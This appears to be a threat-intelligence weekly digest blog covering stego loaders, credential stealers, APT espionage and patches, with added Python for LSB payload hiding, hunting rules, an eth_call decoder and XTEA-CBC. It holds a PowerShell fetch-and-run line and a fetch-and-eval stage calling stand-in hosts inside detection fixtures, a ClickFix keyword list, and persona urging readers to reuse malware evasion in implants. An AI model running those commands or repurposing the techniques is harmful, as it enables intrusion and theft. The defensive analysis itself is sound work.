EvilBit Threat Digest: Steganography Shenanigans and Espionage Escalations

Weekly digest: stego loaders, stealers, APT espionage on aerospace and policy orgs, VDI pivots, and critical RHEL and OT patch updates.

Hey operators, UncleSp1d3r kicking this off with KryptoKat on the assist. This week's been a mixed bag--stealthy loaders coming back with fresh tricks, Iranian espionage squads drilling into aerospace, and the usual crop of vuln patches that remind us why we can't have nice things on the edge. No breakout ransomware waves, but the persistence plays are clever enough to keep your red-team sims spicy. Let's get into it without the fluff.

Malware Evasions: Loaders, Stealers, and Supply-Chain Surprises

Starting with a blast from the past: Splunk has dug into an evolved .NET steganography loader that bundles Lokibot for credential theft across browsers, FTP and email clients, and crypto wallets. The loader hides multi-payload blobs in images or DLLs using LSB steganography, decodes them at runtime with a custom extraction tool called PixDig, and deploys via scheduled tasks or process injection for persistence. For red teams it's a goldmine: pair the stego with API hashing and DNS queries issued from vbc.exe to slip past basic EDR. Blue teams should hunt for EXE loads from %Public% or %Fonts%, anomalous schtasks.exe task creation from XML files, and the published SHA256 hashes. We've seen this family evolve from earlier variants, but the multi-payload flexibility and sandbox evasion (checking for running AV processes) make it a step up; map it to ATT&CK T1053 (Scheduled Task), T1055 (Process Injection) and T1497 (Virtualization/Sandbox Evasion) for your next exercise. Detailed breakdowns and IOCs are in Splunk's analysis and the matching OTX pulse.

KryptoKat: On the defense end, monitor for vbc.exe making unexpected DNS queries and block those hashes; it's a practitioner-level threat, so layer in behavioral rules for injection and credential access.
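To make the stego side concrete, here is an added example (not Splunk's code and not the loader's PixDig) that packs several stages into one blob, writes it into the least significant bit of a flat pixel buffer, and recovers it. The pseudo-random cover buffer, the count/length framing and the 4-byte length prefix are assumptions; a real image carrier would be decoded from PNG/BMP first. The last line of the round trip shows why the trick survives eyeballing: no cover byte moves by more than one.

```python
import random
import struct

# Constructed cover: a flat 8-bit "pixel" buffer standing in for decoded image
# data. The carrier format and the length framing below are assumptions.
def make_cover(size: int, seed: int = 1) -> bytes:
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(size))


def pack_payloads(payloads: list) -> bytes:
    """Concatenate several stages into one blob: 2-byte count, then len+bytes each."""
    blob = struct.pack("<H", len(payloads))
    for p in payloads:
        blob += struct.pack("<I", len(p)) + p
    return blob


def unpack_payloads(blob: bytes) -> list:
    """Inverse of pack_payloads, bounds-checking every declared length."""
    count = struct.unpack_from("<H", blob, 0)[0]
    off, out = 2, []
    for _ in range(count):
        n = struct.unpack_from("<I", blob, off)[0]
        off += 4
        if off + n > len(blob):
            raise ValueError("payload length exceeds blob")
        out.append(blob[off:off + n])
        off += n
    return out


def _read_bytes(carrier: bytes, bit_offset: int, nbytes: int) -> bytes:
    """Rebuild nbytes from the LSB of carrier[bit_offset:], MSB-first per byte."""
    out = bytearray()
    for b in range(nbytes):
        val = 0
        for i in range(8):
            val = (val << 1) | (carrier[bit_offset + b * 8 + i] & 1)
        out.append(val)
    return bytes(out)


def lsb_embed(cover: bytes, payload: bytes) -> bytes:
    """Overwrite the LSB of successive cover bytes with a length-prefixed payload."""
    framed = struct.pack("<I", len(payload)) + payload
    if len(framed) * 8 > len(cover):
        raise ValueError("cover too small for payload")
    out = bytearray(cover)
    idx = 0
    for byte in framed:
        for i in range(7, -1, -1):
            out[idx] = (out[idx] & 0xFE) | ((byte >> i) & 1)
            idx += 1
    return bytes(out)


def lsb_extract(stego: bytes) -> bytes:
    """Read the length prefix from the first 32 carrier bytes, then the payload."""
    if len(stego) < 32:
        raise ValueError("carrier too short")
    length = struct.unpack("<I", _read_bytes(stego, 0, 4))[0]
    if 32 + length * 8 > len(stego):
        raise ValueError("declared length exceeds carrier")
    return _read_bytes(stego, 32, length)


def roundtrip(payloads: list, cover_size: int = 4096) -> tuple:
    """Embed, extract, and report the largest per-byte change made to the cover."""
    cover = make_cover(cover_size)
    stego = lsb_embed(cover, pack_payloads(payloads))
    recovered = unpack_payloads(lsb_extract(stego))
    max_delta = max(abs(a - b) for a, b in zip(cover, stego))
    return recovered, max_delta


if __name__ == "__main__":
    stages, delta = roundtrip([b"stage1-loader.dll", b"lokibot-core.bin"])
    print(stages, "max per-byte change:", delta)
```

The bounds checks in lsb_extract and unpack_payloads are the part worth copying into any extractor you write for triage: a hostile carrier that declares a length past the end of the buffer should fail loudly, not read garbage.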

Shifting to fresh campaigns, eSentire is tracking EVALUSION delivering Amatera Stealer (an upgraded ACR Stealer variant) and NetSupport RAT via ClickFix lures that trick users into pasting PowerShell into the Run dialog. Amatera injects into suspended Chrome/Edge processes to bypass App-Bound Encryption, then targets 149 wallet extensions and 43 password managers, exfiltrating credentials, browser data and wallet contents over obfuscated HTTP. It ships packed with PureCrypter, uses WoW64 syscalls and an AMSI bypass for EDR evasion, and conditionally drops NetSupport for persistent access on domain-joined or crypto-heavy hosts. Red-team angle: mimic the clipboard hijack and PowerShell deobfuscation for social-engineering chains. Blue side: disable mshta.exe and the Win+R Run dialog via GPO, alert on WoW64 syscall usage and encrypted loaders, and block the reported C2 IPs 91.98.229.246 and 45.94.47.224. Dig into the eSentire report and Proofpoint's write-up on Amatera's evolution.

UncleSp1d3r: The WoW64 trick is operator candy--pair it with dynamic API resolution and you'll slide past a lot of hooks. For depth, note the TTPs: T1204.002 for the malicious file prompt, T1059.001 for PowerShell, and T1555.003 for browser cred theft.

KryptoKat: Focus mitigations on user execution blocks and phishing training; MDR for chain detection.
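For the blue-team side of the two items above (the stego loader's %Public%/%Fonts% EXE loads, vbc.exe DNS and schtasks XML creation, and the ClickFix Run-dialog PowerShell), here is an added hunting sketch that is not from Splunk or eSentire. It runs four rules over constructed Sysmon-style JSON events. Assumptions: %Public% and %Fonts% map to C:\Users\Public and C:\Windows\Fonts; a PowerShell process whose parent is explorer.exe with download/hidden-window flags is treated as a Run-dialog paste (that heuristic also catches Start-menu launches, so tune it); RecordId and all paths are constructed.

```python
import json

# Constructed Sysmon-style events: EventID 1 (process create), 7 (image load),
# 22 (DNS query). RecordId is a constructed sequence number.
SAMPLE_LOG = r"""
{"RecordId":1,"EventID":1,"Image":"C:\\Users\\Public\\svchost.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"C:\\Users\\Public\\svchost.exe"}
{"RecordId":2,"EventID":22,"Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe","QueryName":"update.example.invalid"}
{"RecordId":3,"EventID":1,"Image":"C:\\Windows\\System32\\schtasks.exe","ParentImage":"C:\\Users\\Public\\svchost.exe","CommandLine":"schtasks.exe /create /tn Updater /xml C:\\Users\\Public\\t.xml"}
{"RecordId":4,"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell -nop -w hidden -c \"iex (iwr http://cdn.example.invalid/x)\""}
{"RecordId":5,"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"powershell.exe -File C:\\Scripts\\backup.ps1"}
"""

# Assumed expansions of %Public% and %Fonts% on a default install.
SUSPECT_DIRS = ("c:\\users\\public\\", "c:\\windows\\fonts\\")
# Markers typical of pasted ClickFix one-liners (assumption, tune per environment).
CLICKFIX_MARKERS = ("-enc", "-w hidden", "-windowstyle hidden", "iwr ",
                    "invoke-webrequest", "iex", "mshta")


def classify(ev: dict) -> list:
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    eid = ev.get("EventID")
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "").lower()
    parent = ev.get("ParentImage", "").lower()

    # Rule 1: an EXE started from, or mapped from, %Public% or %Fonts%.
    if eid in (1, 7):
        target = image if eid == 1 else ev.get("ImageLoaded", "").lower()
        if target.endswith(".exe") and target.startswith(SUSPECT_DIRS):
            hits.append("exe_from_public_or_fonts")
    # Rule 2: the VB.NET compiler resolving names is not normal on endpoints.
    if eid == 22 and image.endswith("\\vbc.exe"):
        hits.append("vbc_dns_query")
    # Rule 3: scheduled task created from an XML definition.
    if eid == 1 and image.endswith("\\schtasks.exe") and "/create" in cmd and "/xml" in cmd:
        hits.append("schtasks_xml_create")
    # Rule 4: PowerShell launched under explorer.exe with download/hidden flags.
    if (eid == 1 and image.endswith("\\powershell.exe")
            and parent.endswith("\\explorer.exe")
            and any(m in cmd for m in CLICKFIX_MARKERS)):
        hits.append("clickfix_run_dialog")
    return hits


def hunt(jsonl: str) -> dict:
    """Map RecordId -> rule hits for every event that tripped at least one rule."""
    findings = {}
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        hits = classify(ev)
        if hits:
            findings[ev["RecordId"]] = hits
    return findings


if __name__ == "__main__":
    for rec, rules in hunt(SAMPLE_LOG).items():
        print(rec, rules)
```

Rule 4 is the noisiest; in practice you would pair it with the RunMRU registry key or a clipboard-contents telemetry source before paging anyone. Rules 1 to 3 are cheap enough to run as standing queries.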

AhnLab has dissected NKNShell, a RAT distributed since 2023 through a compromised Korean VPN homepage by the cluster AhnLab tracks as Larva-24010. It uses NKN and MQTT for C2, PowerShell loaders for evasion, and tools like MeshAgent and gs-netcat for persistence and remote access, targeting the VPN's users for credential and data theft. TTPs include WMI-created scheduled tasks, encrypted payloads, and AI-generated scripts meant to blend in. Block the published hashes and domains, restrict PowerShell where possible, and monitor for WMI anomalies. Full analysis and IOCs are in AhnLab's report and the OTX pulse.

UncleSp1d3r: Red-team this with NKN proxies for bidirectional C2; it's practitioner-level but resilient.

ClearFake is blending ClickFix social engineering with EtherHiding blockchain-hosted C2 to drop the Vidar (Windows) and AMOS (macOS) stealers. The operators inject JavaScript into compromised sites, then use clipboard tampering and fake CAPTCHA pages to coax victims into running PowerShell or AppleScript, which pulls the next stage out of Binance Smart Chain smart contracts. Cross-platform evasion includes junk code, permission tweaks and automated exfil. Block eth_call JSON-RPC traffic to suspicious BSC contracts and hunt for injected JS and console overrides. Breakdowns in EnkiWhiteHat's analysis and TheHackerNews.

KryptoKat: Mitigate with unsigned script execution blocks and clipboard JS tamper detection.
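Two things a defender needs to see for the EtherHiding piece above: what an eth_call result looks like once you have it, and how to flag the request on the wire. This added example (not ClearFake's loader, not from EnkiWhiteHat) ABI-decodes the single dynamic value an eth_call returns from a contract getter, with bounds checks, and inspects a JSON-RPC body for eth_call to a contract outside an allowlist. The contract address, request id and the JavaScript stage are constructed for the demo; the ABI layout (32-byte offset word, 32-byte length word, zero-padded data) is the standard one.

```python
import json
from typing import Optional

WORD = 32  # ABI head and tail words are 32 bytes

# Constructed values for the demo: not real ClearFake infrastructure.
SUSPECT_CONTRACT = "0x" + "ab" * 20
STAGE = b"fetch('https://cdn.example.invalid/stage2.js').then(r=>r.text()).then(eval)"
SAMPLE_REQUEST = json.dumps({
    "jsonrpc": "2.0", "id": 7, "method": "eth_call",
    "params": [{"to": SUSPECT_CONTRACT, "data": "0x" + "00" * 4}, "latest"],
})


def abi_encode_string(data: bytes) -> str:
    """ABI-encode one dynamic `string`/`bytes` return value, as a getter would."""
    padded = data + b"\x00" * ((WORD - len(data) % WORD) % WORD)
    head = WORD.to_bytes(WORD, "big")           # tail starts right after the head
    length = len(data).to_bytes(WORD, "big")
    return "0x" + (head + length + padded).hex()


def abi_decode_string(result_hex: str) -> bytes:
    """Recover the dynamic value from an eth_call result; reject truncated data."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 2 * WORD:
        raise ValueError("result too short for a dynamic type")
    offset = int.from_bytes(raw[:WORD], "big")
    if offset + WORD > len(raw):
        raise ValueError("tail offset outside result")
    length = int.from_bytes(raw[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(raw):
        raise ValueError("declared length outside result")
    return raw[start:start + length]


def inspect_rpc(body: str, allowed_contracts: frozenset) -> Optional[dict]:
    """Return a finding for eth_call requests; None for non-eth_call or non-JSON."""
    try:
        req = json.loads(body)
    except ValueError:
        return None
    if not isinstance(req, dict) or req.get("method") != "eth_call":
        return None
    params = req.get("params") or []
    first = params[0] if params and isinstance(params[0], dict) else {}
    target = str(first.get("to", "")).lower()
    return {"id": req.get("id"), "to": target,
            "allowed": target in {a.lower() for a in allowed_contracts}}


def demo_chain() -> tuple:
    """Flag the constructed request, then decode the stage its reply would carry."""
    finding = inspect_rpc(SAMPLE_REQUEST, frozenset())
    reply = abi_encode_string(STAGE)     # what the contract getter would return
    return finding, abi_decode_string(reply)


if __name__ == "__main__":
    finding, stage = demo_chain()
    print(finding)
    print(stage.decode())
```

Blocking eth_call outright breaks legitimate wallet software, which is why the allowlist is keyed on the contract address rather than the method; the address is also the pivot you hand to threat intel.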

Wrapping up malware with ESET's reverse engineering of Lazarus's ScoringMathTea RAT, a modular Windows backdoor that uses API hashing (seed 0x2DBB955), polyalphabetic string deobfuscation, HTTP C2 encrypted with TEA/XTEA in CBC mode, and reflective DLL loading. ESET ties it to UAV-sector targeting and has shared scripts and YARA rules for hunters. See ESET's deep dive and the WeLiveSecurity post.

UncleSp1d3r: Operator gold--fork the hashing and reflective loading for your implants; evasion is T1620/1106/1027.007.
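Since the C2 crypto above is just XTEA in CBC mode, here is an added reference implementation (not ESET's script and not the RAT's code) so you can recognise the primitive in a decompiler and decrypt captured traffic once you have the key. XTEA's constants (delta 0x9E3779B9, 32 cycles) are the published ones; the big-endian word order, zero IV and PKCS#7 padding are assumptions, because the page does not say which the RAT uses, and those are exactly the knobs you will have to match against the sample. The tamper test at the end is a reminder that CBC gives no integrity: flipping a ciphertext byte silently flips the same plaintext byte one block later.

```python
import struct

MASK = 0xFFFFFFFF
DELTA = 0x9E3779B9
CYCLES = 32          # reference XTEA; confirm the sample's own count in the decompiler
BLOCK = 8


def xtea_encrypt_block(v0: int, v1: int, key: tuple) -> tuple:
    """One 64-bit block, key as four 32-bit words."""
    s = 0
    for _ in range(CYCLES):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
        s = (s + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
    return v0, v1


def xtea_decrypt_block(v0: int, v1: int, key: tuple) -> tuple:
    """Exact inverse: start at the final sum and walk the schedule backwards."""
    s = (DELTA * CYCLES) & MASK
    for _ in range(CYCLES):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + key[(s >> 11) & 3]))) & MASK
        s = (s - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + key[s & 3]))) & MASK
    return v0, v1


def _pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def _unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def _key_words(key: bytes) -> tuple:
    if len(key) != 16:
        raise ValueError("XTEA key must be 16 bytes")
    return struct.unpack(">4I", key)     # assumed big-endian word order


def xtea_cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    k, prev, out = _key_words(key), iv, bytearray()
    padded = _pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        block = bytes(a ^ b for a, b in zip(padded[i:i + BLOCK], prev))
        c = struct.pack(">2I", *xtea_encrypt_block(*struct.unpack(">2I", block), k))
        out += c
        prev = c
    return bytes(out)


def xtea_cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    if not ciphertext or len(ciphertext) % BLOCK:
        raise ValueError("ciphertext length must be a positive multiple of 8")
    k, prev, out = _key_words(key), iv, bytearray()
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        p = struct.pack(">2I", *xtea_decrypt_block(*struct.unpack(">2I", c), k))
        out += bytes(a ^ b for a, b in zip(p, prev))
        prev = c
    return _unpad(bytes(out))


if __name__ == "__main__":
    KEY, IV = bytes(range(16)), b"\x00" * BLOCK          # constructed test key/IV
    ct = xtea_cbc_encrypt(KEY, IV, b"constructed beacon: host=WS01;user=ops")
    print(ct.hex())
    print(xtea_cbc_decrypt(KEY, IV, ct))
```

When you port this to a decryptor for real captures, the two things that most often differ from the textbook are the word endianness when the implant packs its 32-bit halves and whether the IV is fixed, prepended, or derived; check both before concluding the key is wrong.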

Espionage Edges: APT41 and UNC1549 on the Hunt

APT41 is back with a targeted cyber-espionage push against U.S. non-profits that shape policy, exploiting Log4Shell (CVE-2021-44228) and Atlassian Confluence (CVE-2022-26134) to deploy Deed RAT via DLL side-loading and LOLBins such as rundll32 and msbuild. Once inside, the actors persist via SSH, log keystrokes, capture screens, and exfiltrate over web protocols. Hunt for anomalous vetysafe.exe/Imjpuexc.dll pairings, restrict msbuild execution, and patch those external-facing services. Details in the HivePro advisory, OTX pulse and SecurityAffairs.

KryptoKat: Defenders, enable ADCS auditing and block IOCs; this is expert-level with real intel impact.

Mandiant/Google exposed UNC1549's Iranian espionage TTPs against aerospace and defense: abuse of VDI and the surrounding supply chain (Citrix, VMware, Azure, FortiGate and NVIDIA products), custom tooling (TWOSTROKE, DEEPROOT, LIGHTRAIL, DCSYNCER.SLICK), and phishing for information. The group uses DLL search-order hijacking, DCSync for credential theft, and Azure cloud infrastructure for C2. The report includes YARA rules for hunters. See the Mandiant/Google report and OTX pulse.

UncleSp1d3r: Red-team the DLL hijacks and VDI pivots; it's expert tradecraft for purple exercises.
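DCSync (what DCSYNCER.SLICK is named for) is one of the few techniques above with a clean, well-understood detection: a non-DC account asking a domain controller for directory replication. This added example (not Mandiant's YARA or tooling) runs that logic over constructed Windows Security event 4662 records. The replication control-access GUIDs are the standard Active Directory ones; the account names, domain DN and RecordIds are constructed. Real 4662 Properties fields are multi-line, so the parser just harvests GUIDs wherever they appear.

```python
import re

# Control-access rights a replication partner needs; DCSync asks for these.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed events as a DC would log them (fields trimmed to what the rule needs).
SAMPLE_EVENTS = [
    {"RecordId": 101, "EventID": 4662, "SubjectUserName": "DC02$",
     "ObjectName": "DC=corp,DC=example", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"RecordId": 102, "EventID": 4662, "SubjectUserName": "svc_backup",
     "ObjectName": "DC=corp,DC=example", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"RecordId": 103, "EventID": 4662, "SubjectUserName": "jsmith",
     "ObjectName": "CN=WS01,OU=Workstations,DC=corp,DC=example", "AccessMask": "0x20",
     "Properties": "Write Property {bf967a86-0de6-11d0-a285-00aa003049e2}"},  # ordinary object GUID
    {"RecordId": 104, "EventID": 4624, "SubjectUserName": "svc_backup"},
]


def replication_rights(properties: str) -> list:
    """Names of replication rights referenced in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return sorted(REPLICATION_RIGHTS[g] for g in found if g in REPLICATION_RIGHTS)


def detect_dcsync(events: list, dc_accounts: set, sync_accounts: set = frozenset()) -> list:
    """Alert on replication requests from anything other than DCs or known sync accounts.

    dc_accounts: machine accounts of your domain controllers (e.g. {"DC01$"}).
    sync_accounts: legitimate replication consumers such as an Entra Connect account.
    """
    trusted = {a.lower() for a in dc_accounts} | {a.lower() for a in sync_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "").lower()
        if subject in trusted:
            continue
        alerts.append({"record": ev.get("RecordId"), "subject": subject,
                       "object": ev.get("ObjectName", ""), "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}, {"MSOL_a1b2c3"}):
        print(a)
```

Audit the domain object for "Replicating Directory Changes" control access or 4662 never fires. Get-Changes-All from a user account is the strong signal; Get-Changes alone shows up for some legitimate tooling, so treat the pair, not either GUID, as the DCSync signature, and correlate the subject with its 4624 logon to get the source host the 4662 itself lacks.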

Vuln and Patch Roundup: RHEL Kernels and Web Apps

Tenable's Nessus plugins lit up for RHEL kernel vulns (CVE-2025-39718 and others), Lasso SAML, python-kdcproxy, plus Lucee, Telerik and Drupal fixes. The kernel and web-app issues carry critical DoS and RCE risk; update immediately. See Tenable's updated plugins and a sample RHSA.

Another batch covers Siemens OT products (cleartext credentials, RCE), Motex Lanscope (an actively exploited RCE now in CISA's KEV catalog), FortiGate and Cisco ISE. Patches are available; segment OT networks from IT. See the Tenable plugins and Siemens advisory.

KryptoKat: Blue teams, scan and patch; these are operator-relevant for RHEL and OT environments.

Weird and Worthy: Passkeys and Custom Email Infra

ZDNet looks at roaming authenticators for passkeys, weighing the hardware security of a dedicated device against the convenience and risk of cloud-synced passkeys; a hybrid of both gives the balance for most users. No active threat here, but good reading for identity ops. ZDNet and the FIDO Alliance.

AlienVault exposed 330 custom email domains (Aug-Sep 2025) used for bot-driven fake account creation, with a modified Chrome build using fingerprint evasion to bypass blocklists. Block the domains and tune registration monitoring for bulk sign-up patterns. AlienVault OTX and Security Boulevard.

UncleSp1d3r: Red-team the evasion for your sims; it's practitioner-level but effective.

Closing Thoughts: Edges Are Eternal

UncleSp1d3r: From stego loaders to VDI pivots, this week's toolkit leans heavy on evasion and persistence--perfect for keeping your ops quiet and blue teams guessing. Test those APT41 chains; they're red-gold.

KryptoKat: Fundamentals first--patch edges, hunt logs, and remember: if it's exposed, it's a target. Don't repeat last week's mistakes; next week might not be so forgiving. Stay frosty, team.